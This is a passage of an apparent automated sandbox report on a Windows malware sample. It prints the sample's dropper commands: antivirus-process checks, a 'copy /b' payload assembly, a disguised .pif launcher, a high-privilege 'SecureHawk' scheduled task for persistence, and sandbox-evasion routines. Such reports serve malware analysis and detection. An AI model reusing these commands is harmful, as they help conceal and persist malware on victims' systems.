    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 369580Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomsCompoundInjection" Participants Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\ZJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif 369580\Origin.pif 369580\ZJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHESTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif C:\Users\user\AppData\Local\Temp\369580\Origin.pifJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif" "C:\Users\user\AppData\Local\LinkGuard Dynamics\r"Jump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: d3d11.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dxcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: gpedit.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: activeds.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dssec.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dsuiext.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: framedynos.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: adsldpc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: dsrole.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: logoncli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: ntdsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: authz.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile written: C:\Windows\SysWOW64\GroupPolicy\gpt.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 5daucomrx8.exeStatic file information: File size 19159316 > 1048576
    Source: 5daucomrx8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00318AA5 push ecx; ret 17_2_00318AB8
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0030CBDD push eax; retf 17_2_0030CBF8
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0030CC07 push eax; retf 17_2_0030CBF8
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC8AA5 push ecx; ret 21_2_00AC8AB8

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\369580\Origin.pifJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\369580\Origin.pifJump to dropped file

    Boot Survival

    barindex
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0037577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_0037577B
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00305EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00305EDA
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B2577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_00B2577B
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AB5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_00AB5EDA
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003132E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_003132E9
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifSandbox detection routine: GetCursorPos, DecisionNode, Sleep
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifEvasive API call chain: GetPEB, DecisionNodes, Sleep
    Source: C:\Users\user\Desktop\5daucomrx8.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifStalling execution: Execution stalls by calling Sleep
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,21_2_00FEDB00
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_17-102578
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifAPI coverage: 4.7 %
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifAPI coverage: 1.4 %
    Source: C:\Windows\SysWOW64\timeout.exe TID: 5240Thread sleep count: 125 > 30Jump to behavior
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif TID: 6212Thread sleep count: 67 > 30Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pif TID: 5060Thread sleep count: 69 > 30Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pif TID: 5060Thread sleep count: 106 > 30Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010D49B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 010D49F1h21_2_010D49B0
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003547B7 GetFileAttributesW,FindFirstFileW,FindClose,17_2_003547B7
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00353E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00353E72
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0035C16C
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035CB81 FindFirstFileW,FindClose,17_2_0035CB81
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0035CC0C
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0035F445
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0035F5A2
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0035F8A3
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00353B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00353B4F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00B0C16C
